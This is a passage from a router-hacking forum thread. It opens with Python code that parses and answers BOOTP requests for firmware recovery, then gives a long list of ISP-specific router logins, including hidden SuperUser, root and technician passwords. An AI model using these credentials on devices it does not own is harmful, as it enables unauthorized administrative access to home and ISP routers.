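BOOTREQUEST, BOOTREPLY = 1, 2

def parse_bootp(packet):
    """Decode a BOOTP packet into the fields that matter during recovery."""
    if len(packet) < BOOTP.size:
        raise ValueError("short packet: %d bytes, need %d" % (len(packet), BOOTP.size))
    (op, htype, hlen, _hops, xid, _secs, _flags, _ciaddr, yiaddr, siaddr,
     _giaddr, chaddr, _sname, bootfile, _vend) = BOOTP.unpack(packet[:BOOTP.size])
    if op not in (BOOTREQUEST, BOOTREPLY):
        raise ValueError("not a BOOTP packet (op=%d)" % op)
    if htype != 1 or hlen != 6:
        raise ValueError("expected an Ethernet hardware address")
    return {
        "op": op,
        "xid": xid,
        "mac": ":".join("%02x" % b for b in chaddr[:hlen]),
        "yiaddr": socket.inet_ntoa(yiaddr),   # address offered to the router
        "siaddr": socket.inet_ntoa(siaddr),   # TFTP server holding the build
        "file": bootfile.split(b"\x00", 1)[0].decode("ascii"),
    }

def build_reply(request, client_ip, server_ip, boot_file):
    """Build the BOOTREPLY a server set up as in the post would send back."""
    req = parse_bootp(request)
    if req["op"] != BOOTREQUEST:
        raise ValueError("can only answer a BOOTREQUEST")
    name = boot_file.encode("ascii")
    if len(name) > 127:
        raise ValueError("boot file name too long for the 128-byte field")
    chaddr = request[28:44]  # echo the client's hardware address unchanged
    return BOOTP.pack(BOOTREPLY, 1, 6, 0, req["xid"], 0, 0,
                      socket.inet_aton("0.0.0.0"), socket.inet_aton(client_ip),
                      socket.inet_aton(server_ip), socket.inet_aton("0.0.0.0"),
                      chaddr, b"", name, b"")

# Constructed sample request: made-up MAC and transaction id, not a capture.
SAMPLE_REQUEST = BOOTP.pack(BOOTREQUEST, 1, 6, 0, 0x1A2B3C4D, 0, 0,
                            b"\x00" * 4, b"\x00" * 4, b"\x00" * 4, b"\x00" * 4,
                            bytes.fromhex("020000aabbcc"), b"", b"", b"")

if __name__ == "__main__":
    reply = build_reply(SAMPLE_REQUEST, "192.168.1.254", "192.168.1.64",
                        "ZZQIAA6.2F5.bli")
    print(parse_bootp(SAMPLE_REQUEST), parse_bootp(reply), sep="\n")
```

If a packet capture on the PC shows no request like this arriving on UDP port 67, the router has not entered BootP mode and the file transfer will never start.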
Admin
Admin


Posts : 26
Join date : 2015-03-24

PostSubject: Re: Fixing Username & Password Problems   Tue Mar 24 2015, 19:51

These are the Username/Password pairs for ISP-supplied routers, with MLAP-level where known, as released into the public domain:

Quote:
Generic firmware:
r8+ TG models, Thomson default:
Username: Administrator
Password: either Modem Access Code or Serial Number (printed on the product label, usually fixed to the base)
MLAP: Administrator

r5.3+/r4.3+ models, Thomson default:
Username: Administrator
Password: (blank) (no password)
MLAP: Administrator

Pre-r5.3/r4.3 models, Alcatel/Thomson default:
Username: Administrator (does not apply to early models)
Password: (blank) (no password)
MLAP: (does not apply)

Quote:
BT, UK
BT Home Hub (aka ST-7G):
Username: admin
Password: admin
MLAP: Administrator

Activation codes for Setup Wizard:
522P-22P4-A222-22AT-F24N, or
5225-2374-WG62-22AS-BJ7P
Notes: default MLAP permissions have changed in later firmware: r6.2.6.C disables telnet access to the hub (post #608).

Quote:
Claro (Puerto Rico)
TG582n
TG782
...and others:
Username: (Modem Serial Number) (see sticker on modem bottom/side)
Password: (Modem Serial Number)
MLAP: SuperUser
Extra: web access for config is via http://10.0.0.138/

Quote:
CYTA-Net, Cyprus; UK
All models:
Username: cytadsl
Password: cytaspeed
MLAP: Administrator

All models (probably; TG585v7 confirmed):
Username: cytauser
Password: (blank) (no password)
MLAP: LAN_Admin

All models (probably; TG782 confirmed):
Username: cytahellas
Password: d5l_cyt@_h3l1@$
MLAP: (unknown; possibly SuperUser)

Quote:
Forthnet S.A, Greece
TG784:
Username: dsath
Password: f@0r!T3D
MLAP: root (also remote admin)

Username: user
Password: (empty, no password)
MLAP: PowerUser

Quote:
KPN, Netherlands
TG789vn:
Username: kpn
Password: "" (empty, no password)
MLAP: KPNUser
Username: TGupgrade789KPN
Password: _CYP_37a5272e259d03f1257f77c21bdabc5d (needs decrypting)
MLAP: upgrade

Quote:
Lattelecom, Latvia
TG789vn v3 r8.4.5.F:
Username: Tdvdran
Password: dsls
MLAP: SuperUser

Username: LattelecomUser
Password: user
MLAP: LTUser (User with LAN access to some parts of webGUI)

Username: Lattelecom
Password: (not known)
MLAP: Administrator

Quote:
Maxis FTTH, Malaysia
TG799vn:
Username: Administrator
Password: (<access key>) (on router label)
MLAP: Administrator
extra: To enable public address (port forward):
Change web config login to Administrator as above
change dialin username to xxx@public.maxis.com.my from xxx@home.maxis.com.my
dial-in password is <account number> + 1 (eg a/c num=12345; pw=123451)

Quote:
Meine Medien, Austria
TG585v7 r8.2.6.5:
Username: (blank) (no password)
Password: (blank) (no password)
MLAP: Endkunde

Username: Telek0m
Password: Austria&Eur0
MLAP: Techn_Kundendienst

Username: mquadrat
Password: echecker
MLAP: Konfigurator

Quote:
MEO IPTV, Portugal
TG784:
TG787:
Username: microuser
Password: !C0nf16,M30
MLAP: root
Username: sumeo
Password: m30acc355 (r8.4.2.Q: bfd,10ng)
MLAP: SuperUser
Username: Administrator
Password: 3!play
MLAP: Administrator

Quote:
Netia VDSL2 IPTV, Poland
TG789vn:
Username: netia
Password: (Modem Access Code) (found on label attached to router)
MLAP: SuperUser

Quote:
Netvigator, Asia
TG789Pvn r8.4.D.D:
Username: Administrator
Password: super-adminpccw
MLAP: ???

Quote:
`CRF43' (ISP unknown), New Zealand
TG789vn r8.4.2.U:
Username: Administrator
Password: P1pLi7e42
MLAP: Administrator

Username: Customer
Password: (blank) (no password)
MLAP: User

Quote:
O2 Broadband, UK
ST-780WL:
TG585v7:
Username: SuperUser
Password: O2Br0ad64nd
MLAP: SuperUser

Username: admin
Password: (blank) (no password)
MLAP: Administrator
Notes: default MLAP permissions have been heavily customised on this box; the 'Administrator', as one example, cannot access Telnet.

Quote:
Online, NL
TG712:
Username: online
Password: (blank) (no password)
MLAP: onlineUSER
Username: TGupgrade712ONL
Password: duvZM8MUez2xDSbwg
MLAP: upgrade

Quote:
PlusNET, UK
TG585v7:
early:
Username: Administrator
Password: (Serial Number) (printed on the product label, usually fixed to the base)
late:
Username: admin
Password: (Serial Number) (printed on the product label, usually fixed to the base)
middle:
Username: Administrator
Password: (blank) (no password)
MLAP: Administrator

Notes: if this is first setup, check the address bar: it may have sent you to the PlusNET registration page, and is asking for the PlusNET DSL (Broadband) username/password. Try entering the router Home page address directly (this is the local-LAN address: http://192.168.1.254/).

Quote:
Qtel, Qatar
All routers:
Username: Administrator
Password: connect2th
MLAP: Administrator

Quote:
T-Com, Croatia
TG782:
Username: Administrator
Password: !tc0Mht[ modem_access_code ], ie. if modem_access_code is 1234567890, password will be !tc0Mht1234567890
MLAP: Administrator

T-Home, Macedonia
TG782:
Username: Administrator
Password: CPE.hgw.12
MLAP: Administrator

Quote:
Telekom Austria
TG585 v7:
Username: Administrator
Password: (blank) (no password)
MLAP: Administrator
(Notes: credentials for TG789vn, TG787v, ST585v6 + ST546v6 are believed to be identical)

Quote:
Telepac, Portugal
TG784n:
Username: telepac
Password: telepac
MLAP: Administrator

Quote:
TeliaSonera, Finland
(2011-02-09 note: Sonera are making these passwords ineffective + switching off Telnet; switch off CWMP to stop that happening to you. Thanks to aziztcf for the update)

TG784:
Username: Sonera
Password: S0neRa07
MLAP: SuperUser
Username: admin
Password: S0neRa07
MLAP: Administrator
Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin

Telia, Sweden
TG784:
TG787:
(early firmware):
Username: Telia
Password: stanisskohag
MLAP: SuperUser

Username: Kund
Password: SmartKUND
MLAP: Administrator

Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin

r8.8.B.A firmware:
Username: Aqi47sEL
Password: 2UMT9lfy
MLAP: SuperUser

TG789vn:
r8.8.B.6 firmware:
Username: Aqi47sEL
Password: 2UMT9lfy
MLAP: SuperUser

Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin

r8.8.B.A firmware:
Username: Sonera
Password: d48Fep4P
MLAP: SuperUser

Username: Administrator
Password: (blank) (no password)
MLAP: LAN_Admin (defuser)

Username: UserAgent
Password: !#13qeadzc24WR
MLAP: LAN_Admin (deflocadmin)

Quote:
Telstra / Bigpond, Australia

Note: The Telstra default access IP is 10.0.0.138, as opposed to the normal POTS access IP of 192.168.1.254.

Most models:
Username: admin
Password: (blank) (no password)
MLAP: Administrator
Some older models (eg ST536v6):
Username: admin
Password: admin
MLAP: Administrator

Quote:
Tiscali, Italy
TG784 Firmware: r8.6.H.1:
Username: roott
Password: r00t_th0ms_n
MLAP: ?

Quote:
Vodafone PT, Portugal (`Vodafone Portugal Fiber to Home Technology')
TG585v7:
TG784:
Username: upgrade
Password: Th0ms0n!
MLAP: ?

I shall add to these as I find/get sent them.

2014-03-29: added Cyta tg782 - thanks to releu -AK
2013-06-07: added Telia tg784 r.8.8.B.A - thanks to riomod -AK
2013-02-04: added (unknown) New Zealand ISP - thanks to frm1912 -AK
2013-01-31: added Lattelecom, Latvia - thanks to AndyTheLatvian -AK
2012-11-07: added Telepac, Portugal - thanks to gentlegiant -AK
2012-10-01: added Telia r8.8.B.A (Sonera SMART 2.2.2) - thanks to neryba -AK
2012-09-19: added Oz device details - thanks to Revs Per Mins -AK
2012-08-21: added TG585v7 for Meine Medien, Austria - thanks to MH forum post -AK
2012-08-20: added TG585v7 for Telekom Austria - thanks to MH forum post; AFAIK same credentials for TG789vn, TG787v, ST585v6 + ST546v6 -AK
2012-08-09: added TG799vn for Maxis FTTH, Malaysia - thanks to forum post -AK
2012-07-19: added TG582n for Claro (Puerto Rico) - thanks to testdummy -AK
2011-12-16: added TG787 to the TG784 for Telia, Sweden - thanks to ener_dk -AK
2011-10-05: added Tiscali, Italy info for the TG784 - thanks to chaos.entalpico -AK
2011-09-21: added TeliaSonera, Sweden info for the TG789vn - thanks to roosterx -AK
2011-09-21: added Netvigator, Asia info for the TG789Pvn - thanks to hkcw -AK
2011-08-22: added Qtel Qatar info for the TG585v7 & other routers - thanks to mack21sicnarf -AK
2011-07-06: added KPN Netherlands info for the TG789vn - thanks to retlaw01 -AK
2011-06-25: added Netia Poland info - thanks Thradya -AK
2011-04-06: added Online NL info - thanks Ano -AK
2011-02-09: updated Sonera Finland info - thanks aziztcf -AK
2011-01-17: updated MEO IPTV, TG784 r8.4.2.Q firmware, Portugal (via forum post - thanks surrealiz3) -AK
2010-12-23: added Telia, Sweden (via forum post - thanks Laeraren) -AK
2010-11-29: added PlusNET UK (via forum post - thanks amin12345) -AK
2010-11-21: added TeliaSonera Finland, all passwords (via forum post - thanks aziztcf) -AK
2010-11-15: added CYTA-Net Cyprus, 585v7 LAN_Admin (via forum post - thanks r0gu3ptm) -AK
2010-09-09: added Forthnet, Greece, 784 root (via forum post - thanks Frontier) -AK
2010-09-05: added MEO IPTV, Portugal, 784/787 root (via forum post - thanks surrealiz3) -AK
2010-08-25: added MEO IPTV, Portugal, 784 Administrator (via forum post - thanks youngros) -AK
2010-08-17: added CYTA-Net, Cyprus (via forum post below - thanks r0gu3ptm) -AK
2010-08-02: added Vodafone PT, Portugal (via forum post) -AK
2010-04-23: added T-Home, Macedonia (via PM) -AK
2010-04-06: added T-Com, Croatia -AK
2009-06-18: added MEO IPTV, Portugal -AK
_________________
Alex Kemp